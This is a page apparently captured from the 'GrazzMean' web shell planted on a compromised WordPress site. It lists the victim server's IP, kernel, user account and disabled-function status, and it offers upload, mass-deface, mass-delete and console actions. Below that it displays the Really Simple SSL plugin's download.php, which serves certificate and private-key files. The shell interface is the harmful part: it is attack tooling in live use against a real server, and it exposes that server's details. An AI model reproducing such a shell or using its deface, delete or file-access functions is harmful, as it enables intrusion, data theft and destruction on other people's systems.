shell bypass 403

GrazzMean Shell

: /home/www/phadsconsult.com/wp-content/plugins/really-simple-ssl/lets-encrypt/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.144.3.168
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : download.php 
<?php
# No need for the template engine
define( 'WP_USE_THEMES', false );

#find the base path
define( 'BASE_PATH', rsssl_find_wordpress_base_path()."/" );
# Load WordPress Core
if ( !file_exists(BASE_PATH . 'wp-load.php') ) {
	die("WordPress not installed here");
}
require_once( BASE_PATH.'wp-load.php' );
require_once( ABSPATH.'wp-includes/class-phpass.php' );
require_once( ABSPATH . 'wp-admin/includes/image.php' );

if ( !rsssl_user_can_manage() ) {
	die();
}
if ( !isset($_GET["type"]) ) {
	die();
}

if (!isset($_GET['token'])) {
	die();
}

if (!wp_verify_nonce($_GET['token'], 'rsssl_download_cert')){
	die();
}

$type = sanitize_title($_GET['type']);
switch($type) {
	case 'certificate':
		$file = get_option('rsssl_certificate_path');
		$file_name = 'certificate.cert';
		break;
	case 'private_key':
		$file = get_option('rsssl_private_key_path');
		$file_name = 'private.pem';
		break;
	case 'intermediate':
		$file = get_option('rsssl_intermediate_path');
		$file_name = 'intermediate.pem';
		break;
	default:
		$file = false;
}

if (!file_exists($file)) {
	$content = __("File missing. Please retry the previous steps.", "really-simple-ssl");
	die();
} else {
	$content = file_get_contents($file);
}

$fp = fopen($file, 'rb');
if ($fp) {
	if (function_exists('mb_strlen')) {
		$fsize = mb_strlen($content, '8bit');
	} else {
		$fsize = strlen($content);
	}
	$path_parts = pathinfo($file);

	header("Content-type: text/plain");
	header("Content-Disposition: attachment; filename=\"".$file_name."\"");
	header("Content-length: $fsize");
	header("Cache-Control: private",false); // required for certain browsers
	header("Pragma: public"); // required
	header("Expires: 0");
	header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
	header("Content-Transfer-Encoding: binary");
	echo $content;
} else {
	echo "Something went wrong #2";
}
fclose($fp);


function rsssl_find_wordpress_base_path()
{
	$path = dirname(__FILE__);

	do {
		if (file_exists($path . "/wp-config.php")) {
			//check if the wp-load.php file exists here. If not, we assume it's in a subdir.
			if ( file_exists( $path . '/wp-load.php') ) {
				return $path;
			} else {
				//wp not in this directory. Look in each folder to see if it's there.
				if ( file_exists( $path ) && $handle = opendir( $path ) ) {
					while ( false !== ( $file = readdir( $handle ) ) ) {
						if ( $file != "." && $file != ".." ) {
							$file = $path .'/' . $file;
							if ( is_dir( $file ) && file_exists( $file . '/wp-load.php') ) {
								$path = $file;
								break;
							}
						}
					}
					closedir( $handle );
				}
			}

			return $path;
		}
	} while ($path = realpath("$path/.."));

	return false;
}
© 2025 GrazzMean